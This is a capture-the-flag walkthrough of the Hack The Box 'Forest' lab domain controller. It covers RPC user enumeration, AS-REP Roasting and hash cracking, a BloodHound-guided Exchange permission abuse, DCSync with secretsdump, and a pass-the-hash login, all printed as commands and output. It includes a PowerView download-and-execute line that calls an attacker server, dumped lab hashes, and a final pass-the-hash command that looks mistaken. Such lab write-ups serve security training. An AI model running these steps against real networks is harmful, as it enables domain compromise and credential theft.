Forest

Quick Summary

Hey guys, here’s my write-up of the Forest box. It was a great box and very realistic.

We start by enumerating users over RPC, then attack Kerberos with AS-REP Roasting,

and privilege escalation is possible once our user is in the Exchange Windows Permissions security group.

Recon

Nmap

Start with scanning all ports:

nmap -p- 10.10.10.161 --min-rate=10000

The full port scan shows the following open ports:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-21 14:19 EET
Warning: 10.10.10.161 giving up on port because retransmission cap hit (10).
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.30s latency).
Not shown: 65505 closed ports
PORT      STATE    SERVICE
53/tcp    open     domain
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
5985/tcp  open     wsman
9389/tcp  open     adws
47001/tcp open     winrm
49664/tcp open     unknown
49665/tcp open     unknown
49666/tcp open     unknown
49667/tcp open     unknown
49671/tcp open     unknown
49676/tcp open     unknown
49677/tcp open     unknown
49684/tcp open     unknown
49703/tcp open     unknown
49924/tcp open     unknown

Then enumerate service versions on the interesting open ports:

nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 10.10.10.161

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-21 14:25 EET
Nmap scan report for htb.local (10.10.10.161)
Host is up (0.38s latency).

PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-21 12:36:15Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf       .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/21%Time=5F9028C8%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m36s, deviation: 4h02m32s, median: 10m34s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-10-21T05:38:46-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-10-21T12:38:45
|_  start_date: 2020-10-21T11:54:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 293.67 seconds

Looks like we are dealing with a domain controller (DNS, Kerberos, LDAP and the global catalog ports are all open, and the SMB scripts report the FOREST.htb.local FQDN).

DNS Enumeration

We can resolve htb.local and forest.htb.local through this DNS server:

dig any @10.10.10.161 htb.local

; <<>> DiG 9.16.2-Debian <<>> any @10.10.10.161 htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55034
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 3ccc9f26efdc3210 (echoed)
;; QUESTION SECTION:
;htb.local.			IN	ANY

;; ANSWER SECTION:
htb.local.		600	IN	A	10.10.10.161
htb.local.		3600	IN	NS	forest.htb.local.
htb.local.		3600	IN	SOA	forest.htb.local. hostmaster.htb.local. 100 900 600 86400 3600

;; ADDITIONAL SECTION:
forest.htb.local.	3600	IN	A	10.10.10.161

;; Query time: 208 msec
;; SERVER: 10.10.10.161#53(10.10.10.161)
;; WHEN: Wed Oct 21 18:38:38 EET 2020
;; MSG SIZE  rcvd: 150

SMB Enumeration

Since netbios-ssn is open on port 139 (and SMB on 445), let’s run smbmap and see what we get. If you’re not on Kali you can get smbmap from here.

smbmap -H 10.10.10.161

[+] Finding open SMB ....
[+] User SMB session establishd on 10.10.10.161...
[+] IP: 10.10.10.161:445        Name: 10.10.10.161                                      
        Disk                                                    Permissions
        ----                                                    -----------
[!] Access Denied

I also tried smbclient but got nothing:

smbclient -N -L //10.10.10.161

Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

RPC Enumeration

Here we can see that MSRPC (port 135) is open, so we can enumerate information out of AD using rpcclient with a null session.

Connect with rpcclient -U "" -N 10.10.10.161; to get a list of users, use enumdomusers:

rpcclient -U "" -N 10.10.10.161

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

We can list groups too:

rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
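To turn the enumdomusers output above into a candidate list like the users file used in the next section, here is an added Python helper (not part of the original write-up). It parses rpcclient's user:[name] rid:[0x..] lines and drops the Exchange system mailboxes (SM_*, HealthMailbox*, $...) and the default built-in accounts that are disabled out of the box; the sample input is a constructed subset of the output shown above.

```python
import re

# Matches rpcclient enumdomusers lines such as: user:[sebastien] rid:[0x479]
USER_RE = re.compile(r"user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")

# Accounts that Exchange or Windows create automatically. They are not
# interactive users and are normally disabled, so they are skipped.
SYSTEM_PREFIXES = ("SM_", "HealthMailbox", "$")
BUILTIN_SKIP = {"Guest", "krbtgt", "DefaultAccount"}


def parse_enumdomusers(text):
    """Return a list of (name, rid) tuples parsed from rpcclient output."""
    users = []
    for line in text.splitlines():
        m = USER_RE.search(line)
        if m:
            users.append((m.group("name"), int(m.group("rid"), 16)))
    return users


def candidate_accounts(text):
    """Names worth reviewing: parsed users minus system-generated and default accounts."""
    return [
        name for name, rid in parse_enumdomusers(text)
        if not name.startswith(SYSTEM_PREFIXES) and name not in BUILTIN_SKIP
    ]


# Constructed sample: a subset of the enumdomusers output shown above.
SAMPLE = """rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
"""

if __name__ == "__main__":
    for name in candidate_accounts(SAMPLE):
        print(name)
```

The RID is kept alongside the name because it is the quickest way to tell built-in principals (RID below 1000) from accounts created later, which is useful when reviewing who exists in a domain.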

AS-REP Roasting

So what is an AS-REP Roasting attack?

It is a technique against Kerberos that allows password hashes to be retrieved for users that do not require pre-authentication. If a user has “Do not require Kerberos pre-authentication” enabled, then an attacker can obtain a Kerberos AS-REP encrypted with a key derived from the user’s password (RC4-HMAC in this case) and attempt to crack it offline.

By default, “Do not require Kerberos pre-authentication” is disabled for domain users.

I have a list of accounts from my RPC enumeration above.

cat users

svc-alfresco
sebastien
lucinda
andy
mark
santi
Administrator

Now we can use GetNPUsers.py from Impacket to try to get a hash for each user, and I find one for the svc-alfresco account:

GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/ -usersfile users

$krb5asrep$23$svc-alfresco@HTB:5b3dd5b04029f657ab282c0819f4db32$9d31baa165064b2f1bbdd08c710f1dff4f146a8fbb35d6ad96157388b6821845346cf135331baf023a08f42da56597dea93859534bcec0a4e2830ad03faf667d231bb6cedb8992462c16c9e048aef8bb55ab7c3c45d53068b60b6b1677795664476eab5b01525cd23cb793b38fe8c357bcd635e938a46b20c6c596c41141a027fddb86b7480aa4df7ed91d91dd6a6efc94f400d2d159d52e9dc32be28ff50b6dbf6cdc228bf3e841073ea644d526fcb08e1472bb796ac7fa831598b73f8509d9bc5f68c14c17879df8dfbbf035ec4553d279c336cf4dca3b52c747a966fb6036
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
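The two things worth understanding from the output above are the userAccountControl flag that makes an account roastable and the layout of the line GetNPUsers.py prints. The following Python is an added example, not part of the original write-up or of Impacket: it decodes the DONT_REQUIRE_PREAUTH bit from constructed (name, userAccountControl) pairs as a defender would when auditing a domain, and it parses the hashcat mode 18200 line into its fields. The sample line reuses the svc-alfresco checksum shown above with the encrypted part truncated.

```python
import re

# userAccountControl bits (from the Active Directory schema).
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000   # the "Do not require Kerberos preauthentication" checkbox

# Layout of the line GetNPUsers.py printed above (hashcat mode 18200, etype 23):
#   $krb5asrep$<etype>$<user>@<REALM>:<32 hex checksum>$<hex encrypted part>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<cipher>[0-9a-f]+)$"
)


def preauth_disabled(uac):
    """True if this userAccountControl value has DONT_REQUIRE_PREAUTH set."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH)


def roastable_accounts(entries):
    """Audit helper: from (sAMAccountName, userAccountControl) pairs, return the
    enabled accounts whose AS-REP could be requested without pre-authentication."""
    return [
        name for name, uac in entries
        if preauth_disabled(uac) and not uac & UF_ACCOUNTDISABLE
    ]


def parse_asrep_hash(line):
    """Split a $krb5asrep$ line into its fields, or return None if it is not one.
    For etype 23 the enc-part starts with a 16-byte HMAC-MD5 checksum followed by
    the RC4-encrypted data; an offline guess is verified against these two values."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    fields["cipher_bytes"] = len(fields["cipher"]) // 2
    return fields


# Constructed sample directory entries: only svc-alfresco has the flag set and
# is enabled; "old-svc" has it set but is disabled (0x2), so it is not reported.
SAMPLE_ENTRIES = [
    ("sebastien", 0x10200),      # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("svc-alfresco", 0x410200),  # ... | DONT_REQUIRE_PREAUTH
    ("old-svc", 0x400202),       # DONT_REQUIRE_PREAUTH | ACCOUNTDISABLE
]

# Constructed sample: the line printed above, with the encrypted part truncated.
SAMPLE_LINE = (
    "$krb5asrep$23$svc-alfresco@HTB:5b3dd5b04029f657ab282c0819f4db32"
    "$9d31baa165064b2f1bbdd08c710f1dff4f146a8fbb35d6ad96157388b6821845"
)

if __name__ == "__main__":
    print("accounts without pre-auth:", roastable_accounts(SAMPLE_ENTRIES))
    print(parse_asrep_hash(SAMPLE_LINE))
```

On the defensive side the same check is an LDAP query with the bitwise-AND matching rule, (&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304)), and a domain controller logs each such request as event 4768 with Pre-Authentication Type 0, which is a cheap detection for this technique.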

Crack Hash

Now I can use hashcat to break the hash:

hashcat -m 18200 alfresco.kerb /usr/share/wordlists/rockyou.txt --force

$krb5asrep$23$svc-alfresco@HTB:4479d427f1cbdc2b8cf00073ad70141d$7236f2b86d80ff1cd2feac6f8e6b7b2438e353e9e90d7e3988212235bd14d81eaedeafe9f78a10159c08df738674896586f9c42badb21557db914ec859c16060de1d61687d4ec20f1b4e644520815518408858ee04c1b3aabecbbbe08030dbaf49a82bebacbad772e8af4bd51b31305d636bdfda8af8aa3886350cdbeb4cc90fb45691d68431248b0f236faae01016399580c2efa8a64dd59980c5987a78121dce24bd20016b46e79b515f32bfd125abe8265a285c30e403030613e8362bb3abb7d829364b2a3979f0a0b728835446a2c48e572190b46afcb23544552ee1dd55:s3rvice

We get the password s3rvice.

WinRM

Now we can use Evil-WinRM to connect to the box:

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

From here I can grab user.txt:

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4e47a************************

Privesc to Administrator

Enumeration

I used SharpHound to collect data for BloodHound.

So what is BloodHound?

BloodHound is a tool for visualizing an Active Directory environment as a graph. This representation then offers all the power of graph theory to unravel new attack paths.

It can be used on engagements to identify different attack paths in Active Directory (AD); this encompasses access control lists (ACLs), users, groups, trust relationships and unique AD objects. The tool can be leveraged by both blue and red teams to find different paths to targets. Data is collected by an ingestor; SharpHound is the one used here.

Let’s upload SharpHound and invoke it:

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls

    Directory: C:\Users\svc-alfresco\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/21/2020   3:58 PM          15312 20201021155757_BloodHound.zip
-a----       10/21/2020   3:58 PM          23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin

Now we download the results to my box. Evil-WinRM makes this easy with its download command:

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20201021155757_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20201021155757_BloodHound.zip to 20201021155757_BloodHound.zip
                                                             
Info: Download successful!

Installing and using BloodHound is covered in this walkthrough:

https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/

You can drag the data file into BloodHound or use the Upload Data button.

In the query field you can search for a user, domain or group to see which objects are linked to which.

For example, search for svc-alfresco@htb.local, right-click it and choose “Shortest Paths to Here”, and you will see the domain users and groups linked to the svc-alfresco user.

I’ll click “Find Shortest Paths to Domain Admins” and get the following graph:

Exchange and high privileges

Because my user is in Service Accounts, which is a member of Privileged IT Accounts, which is a member of Account Operators, it’s basically like my user is a member of Account Operators. And Account Operators has GenericAll on the Exchange Windows Permissions group. That group in turn has WriteDacl on the domain object, which is what the DCSync step below relies on.

I found a great blog post about abusing Exchange permissions this way.
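The chain above is a path query over a small graph, which is all BloodHound is doing at scale. The following Python is an added example (not from the original write-up and not BloodHound's own code): it encodes the page's edges as a constructed edge list, finds the shortest path from svc-alfresco to the domain object with a breadth-first search, and, from the blue-team side, reports which plain user accounts have any path to that object. The WriteDacl edge from Exchange Windows Permissions to HTB.LOCAL is an assumption; it is the permission that the DCSync step later in the write-up depends on.

```python
from collections import deque

# Constructed edge list reproducing the chain described above. Relationship
# names follow BloodHound's edge labels. The WriteDacl edge is assumed (see lead-in).
EDGES = [
    ("svc-alfresco", "MemberOf", "Service Accounts"),
    ("Service Accounts", "MemberOf", "Privileged IT Accounts"),
    ("Privileged IT Accounts", "MemberOf", "Account Operators"),
    ("Account Operators", "GenericAll", "Exchange Windows Permissions"),
    ("Exchange Windows Permissions", "WriteDacl", "HTB.LOCAL"),
    # A regular user with no path to the domain object, for contrast.
    ("andy", "MemberOf", "Domain Users"),
    ("svc-alfresco", "MemberOf", "Domain Users"),
]
USERS = {"svc-alfresco", "andy"}   # non-group principals we want to audit


def build_graph(edges):
    """Adjacency list: node -> list of (relationship, target)."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
    return graph


def shortest_path(graph, start, goal):
    """Breadth-first search; returns the hops as (source, relationship, target)
    tuples, or None when the goal is unreachable."""
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, hops = queue.popleft()
        if node == goal:
            return hops
        for rel, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, hops + [(node, rel, nxt)]))
    return None


def describe(hops):
    """Render hops as: a -MemberOf-> b -GenericAll-> c"""
    if not hops:
        return ""
    text = hops[0][0]
    for _, rel, dst in hops:
        text += f" -{rel}-> {dst}"
    return text


def users_reaching(graph, users, goal):
    """Audit view: which plain user accounts have any path to the goal object."""
    return sorted(u for u in users if shortest_path(graph, u, goal) is not None)


GRAPH = build_graph(EDGES)

if __name__ == "__main__":
    path = shortest_path(GRAPH, "svc-alfresco", "HTB.LOCAL")
    print(describe(path))
    print("users with a path to the domain object:",
          users_reaching(GRAPH, USERS, "HTB.LOCAL"))
```

Removing any single edge in the chain (for example taking Service Accounts out of Privileged IT Accounts, or stripping the Exchange group's rights on the domain object) makes users_reaching return an empty list, which is the check to repeat after a fix.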

In BloodHound, clicking an edge and opening the “Abuse Info” tab in the pop-up shows the steps for this path:

Grant DCSync Privileges

First we add our user to the "Exchange Windows Permissions" group:

net group "Exchange Windows Permissions" svc-alfresco /add /domain

We upload PowerView and invoke it to complete the attack. The credential and domain values in the next three lines are the example values from PowerView’s own usage notes (TESTLAB\dfm.a, Password123!, testlab.local) and stand in for the current account and the htb.local domain:

# Load PowerView into the current session from the attacker's web server
iex(new-object net.webclient).downloadstring("http://10.10.16.136:8080/PowerView.ps1")
# Build a credential object for the account that is now in Exchange Windows Permissions
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
# Add the replication (DCSync) rights to the domain object's DACL
Add-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync

And I can see the user in the new group:

*Evil-WinRM* PS C:\> net group 'Exchange Windows Permissions'
Group name     Exchange Windows Permissions
Comment        This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.

Members
-------------------------------------------------------------------------------
svc-alfresco             
The command completed successfully.

I run secretsdump.py to get hashes:

secretsdump.py svc-alfresco:s3rvice@10.10.10.161

Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...[snip]...
[*] Cleaning up... 

Shell

evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator

And we owned root! That’s it.

Feedback is appreciated!
